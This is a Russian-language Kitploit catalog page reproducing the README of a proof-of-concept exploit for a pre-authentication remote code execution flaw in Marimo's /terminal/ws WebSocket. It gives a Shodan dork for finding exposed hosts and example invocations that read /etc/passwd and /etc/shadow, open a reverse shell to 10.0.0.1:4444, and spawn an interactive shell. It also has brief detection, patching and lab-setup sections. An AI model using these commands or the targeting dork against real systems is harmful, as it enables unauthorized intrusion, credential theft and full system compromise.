Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/fevar54/marimo_cve-2026-39987_rce_poc
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubfevar54/marimo_cve-2026-39987_rce_poc

marimo_CVE-2026-39987_RCE_PoC

PoC для CVE-2026-39987: RCE до аутентификации через WebSocket в Marimo версии ниже 0.23.0 (CVSS 9.3).

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
14 месяцев назадЕщё не проверено

CVE-2026-39987 - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

⚠️ ПРАВОВОЕ ПРЕДУПРЕЖДЕНИЕ ⚠️

Этот скрипт предназначен ТОЛЬКО для образовательных целей и авторизованного тестирования. Несанкционированное использование этого инструмента против систем без явного разрешения НЕЗАКОННО. Автор не несет ответственности за неправомерное использование этой информации.

📋 Описание

Версии Marimo до 0.23.0 содержат критическую уязвимость удаленного выполнения команд (RCE) без предварительной аутентификации. Конечная точка /terminal/ws не реализует надлежащие механизмы контроля доступа, что позволяет неаутентифицированному атакующему получить полную интерактивную оболочку в системе.

ДетальИнформация
CVECVE-2026-39987
СерьезностьКРИТИЧЕСКАЯ
CVSS Score9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H)
ТипPre-Auth Remote Code Execution (RCE)
ВекторWebSocket (/terminal/ws)
Затронутый продуктMarimo < 0.23.0
ПатчMarimo ≥ 0.23.0

🎯 Воздействие

  • ✅ Удаленное выполнение команд БЕЗ аутентификации
  • ✅ Полная интерактивная PTY-оболочка
  • ✅ Полная компрометация системы
  • ✅ Доступ к конфиденциальным данным
  • ✅ Возможное горизонтальное перемещение по сети

🔍 Идентификация

Shodan Dork

http.favicon.hash:-1864630356

text

Отпечаток

  • Favicon hash: -1864630356
  • Версия конечной точки: /api/version

💀 PoC эксплуатации

Требования

root@kitploit:~
pip install websockets requests
Основное использование
bash
python CVE-2026-39987_PoC.py http://victima.com:8080 "id"
Примеры
bash
# Получение информации о системе
python CVE-2026-39987_PoC.py http://target.com:8080 "id"
python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a"
python CVE-2026-39987_PoC.py http://target.com:8080 "whoami"

# Чтение конфиденциальных файлов
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd"
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow"

# Reverse shell
python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

# Интерактивная оболочка
python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
🛡️ Обнаружение (Безопасное)
Скрипт пассивного обнаружения
bash
python detector.py -u http://target.com:8080
python detector.py -l urls.txt
Nuclei Template
yaml
# marimo-cve-2026-39987.yaml
id: CVE-2026-39987

info:
  name: Marimo < 0.23.0 Pre-Auth RCE
  severity: critical
  # ... (полный шаблон включен)
🔧 Устранение
Немедленное
ОТКЛЮЧИТЬ систему от сети, если она подвержена воздействию

Заблокировать доступ к порту, на котором работает Marimo

Проверить журналы на предмет подозрительной активности

Постоянное
bash
# Обновление до пропатченной версии
pip install --upgrade marimo>=0.23.0

# Проверка версии
marimo --version

# Настройка аутентификации при публичном доступе
# НИКОГДА не открывайте 'marimo edit' напрямую в интернет

Docker (Уязвимая среда)
bash
# Запуск уязвимой версии для тестирования
docker run -p 8080:8080 marimo-team/marimo:0.22.0

# Проверка уязвимости
python CVE-2026-39987_detector.py http://localhost:8080

# Эксплуатация
python CVE-2026-39987_PoC.py http://localhost:8080 "id"

GitHub Security Advisory

NVD Entry

Pull Request #9098

Marimo Documentation

👥 Авторы
Обнаружение: [Имя исследователя]

Разработка PoC: [Ваше имя]

Патч: Marimo Team

📜 Лицензия
Этот проект предназначен только для образовательных целей. Использование этого программного обеспечения осуществляется на ваш собственный риск.

⭐ Если этот README был вам полезен, рассмотрите возможность поставить звезду репозиторию.

⚠️ ПОМНИТЕ: С БОЛЬШОЙ СИЛОЙ ПРИХОДИТ БОЛЬШАЯ ОТВЕТСТВЕННОСТЬ
Скачать инструмент